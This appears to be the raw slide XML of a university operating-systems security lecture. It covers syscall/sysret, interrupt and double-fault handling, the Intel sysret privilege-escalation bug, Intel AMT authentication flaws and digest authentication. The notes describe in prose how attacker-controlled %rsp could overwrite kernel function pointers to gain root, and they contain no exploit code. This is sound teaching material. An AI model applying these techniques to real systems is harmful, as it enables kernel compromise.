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4" r:id="rId3"/>
    <p:sldId id="267" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="275" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="278" r:id="rId10"/>
    <p:sldId id="274" r:id="rId11"/>
    <p:sldId id="282" r:id="rId12"/>
    <p:sldId id="283" r:id="rId13"/>
    <p:sldId id="284" r:id="rId14"/>
    <p:sldId id="285" r:id="rId15"/>
    <p:sldId id="286" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="331" r:id="rId22"/>
    <p:sldId id="325" r:id="rId23"/>
    <p:sldId id="326" r:id="rId24"/>
    <p:sldId id="333" r:id="rId25"/>
    <p:sldId id="332" r:id="rId26"/>
    <p:sldId id="334" r:id="rId27"/>
    <p:sldId id="340" r:id="rId28"/>
    <p:sldId id="335" r:id="rId29"/>
    <p:sldId id="336" r:id="rId30"/>
    <p:sldId id="337" r:id="rId31"/>
    <p:sldId id="338" r:id="rId32"/>
    <p:sldId id="329" r:id="rId33"/>
    <p:sldId id="33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FFFF"/>
    <a:srgbClr val="FFCCCC"/>
    <a:srgbClr val="FFFF66"/>
    <a:srgbClr val="66FF99"/>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8400" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="53" d="100"/>
          <a:sy n="53" d="100"/>
        </p:scale>
        <p:origin x="136" y="48"/>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1047138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https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00075.html]</a:t>
            </a:r>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128705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https://twitter.com/x0rz/status/859316660808937472]</a:t>
            </a:r>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295013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https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/</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339014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syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“saves RFLAGS into R11 and then masks RFLAGS using the IA32_FMASK MSR (MSR address C0000084H); specifically, the processor clears in RFLAGS every bit corresponding to a bit that is set in the IA32_FMASK MSR”; see [1].]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argument-passing convention for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is the convention defined by the AMD64 ABI; see [4] below.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: [1] https://www.felixcloutier.com/x86/syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        [2] https://www.felixcloutier.com/x86/sysret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        [3] https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        [4] https://wiki.osdev.org/Sysenter#AMD:_SYSCALL.2FSYSRET</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745107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loads %rip using the value in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>https://wiki.osdev.org/Exceptions#General_Protection_Fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>        https://wiki.osdev.org/Exceptions#Page_Fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>        https://en.wikipedia.org/wiki/NX_bit#x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9E9BFF26-3CAE-4DCF-9C1E-4F3982829741}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3506815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[1]:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    x86-64 interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Interrupt descriptor table (IDT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>*Array of 256 pointers to interrupt handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>*Interrupt handler = instruction + metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-Can unprivileged code invoke the interrupt handler directly?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-What privilege level does the interrupt handler use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-Should interrupts be disabled when the interrupt handler runs?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Global descriptor table and task structures (GDT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>*Locates the IDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>*Locates the kernel stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Chickadee, once the OS’s interrupt handler is running, that handler will copy state from the CPU stack to the kernel stack of the currently running process, and then call proc::exception(). Linux handles this situation differently---in Linux, all interrupt handling occurs on a core’s local interrupt stack.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: [1] https://read.seas.harvard.edu/cs161-19/lectures/lecture3/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        [2] https://www.kernel.org/doc/Documentation/x86/kernel-stacks]</a:t>
            </a:r>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195685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4065797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459115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https://os.phil-opp.com/double-fault-exceptions/   //The source for the double-fault table]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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36420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[4] says, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Due to the signature verification, developing free replacement firmware for the ME is basically impossible. The only entity capable of replacing the ME firmware is Intel.”]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: [1] https://files.bitkeks.eu/docs/intelme-report.pdf  //”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Intel Management Engine (Hauptseminar Technischer Datenschutz)“ by Dominik Pataky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>        [2] https://invisiblethingslab.com/resources/bh09usa/Ring%20-3%20Rootkits.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>        [3] https://mirrors.dotsrc.org/cdn.media.ccc.de/congress/2017/slides-pdf/34c3-8782-intel_me_myths_and_reality.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>        [4] https://libreboot.org/faq.html#intel</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136548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double fault indicates that the machine is so messed up that recovery is effectively impossible. In our running example, recovery is impossible because the kernel has no way to determine what the right %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value is for the kernel. Linux’s double-fault handler just tries to dump some register state and then sit in a while(1) loop that executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: Volume 3A, page 6-29 of Intel 64 and IA-32 Architectures Software Developer’s Manual, provides the quoted text about how a double-fault should induce a kernel to panic. Volume 2B, page 4-513 describes how a push instruction will cause a stack segment fault if %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has a noncanonical form.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: https://os.phil-opp.com/double-fault-exceptions/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://wiki.osdev.org/Exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://media.blackhat.com/bh-us-12/Briefings/Wojtczuk/BH_US_12_Wojtczuk_A_Stitch_In_Time_WP.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://github.com/torvalds/linux/blob/master/arch/x86/kernel/doublefault.c</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1143338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in the slide will crash the machine. However, a more clever attack could actually give the attacker root privileges! The basic idea behind the more clever attack is that %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is controlled by the attacker—so, the attacker can set %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to a carefully-chosen value that will overwrite important control flow structures in the kernel. Examples of such control flow structures include kernel function pointers. Note that the structures will be overwritten by ATTACKER-CONTROLLED VALUES, since the stuff that gets pushed on the stack will be the values of attacker-controlled registers; remember that, right before the kernel calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the kernel has restored the user-mode registers. Refs [1] and [3] provide examples of such an attack.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Here’s a web page that translates Intel-syntax assembly to the associated C strings: https://defuse.ca/online-x86-assembler.htm]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: [1] https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/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https://media.blackhat.com/bh-us-12/Briefings/Wojtczuk/BH_US_12_Wojtczuk_A_Stitch_In_Time_WP.pdf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//Has a more explicit explanation of [1]’s observation that why a FreeBSD kernel’s #GP handler will cause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//page fault. The explanation is that, on FreeBSD, the default value for a user-mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gs:base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 0 (i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gs:base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//points to the unmapped NULL page); so, when the #GP handler tries to execute code like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PCPU(CURPCB),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rdi</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//to access per-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> data structures that would normally be pointed to by the kernel’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gs:base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, the code will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//trigger a page fault, because the #GP handler didn’t perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>swapgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (because the #GP was caused by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//kernel code trying to implement the return-to-user-mode via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and that kernel code had swapped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gs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//to the user-mode value before calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        [3] https://cyseclabs.com/blog/cve-2014-4699-linux-kernel-ptrace-sysret-analysis]</a:t>
            </a:r>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1906291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https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf   //See the entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysret</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261332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https://en.wikipedia.org/wiki/Intel_Active_Management_Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://www.symantec.com/connect/articles/why-must-intel-amt-be-configured-and-what-required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://www.blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-Stealth-Breakthrough-wp.pdf]</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374409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images in the next few slides are taken from a Black Hat presentation from 2017.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Ref: https://www.blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-Stealth-Breakthrough-wp.pdf]</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80166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14174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https://en.wikipedia.org/wiki/Digest_access_authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        https://tools.ietf.org/html/rfc2617</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320266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3254360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particularly important that HA1 is never revealed to the network, because if the network attacker can see HA1, then the attacker can successfully masquerade as the admin user!</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356268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Flash memory is the technology used by SSDs.</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20133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4/29/2019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7356" y="3350446"/>
            <a:ext cx="5648644" cy="1570467"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS 161: Lecture 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4/29/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969505" y="1928096"/>
            <a:ext cx="4604346" cy="1296364"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Related image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A03908-CC6F-4125-BDCF-67A07D725A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34"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6387125" y="-1"/>
            <a:ext cx="580487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809F43-6DA4-4A0B-83DF-91F484EE4231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608926" y="609166"/>
            <a:ext cx="9451626" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HA1 = hash(username || realm || password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HA2 = hash(method || URI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response = hash(HA1 || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>serverNonce</a:t>
            </a:r>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clientNonceCount</a:t>
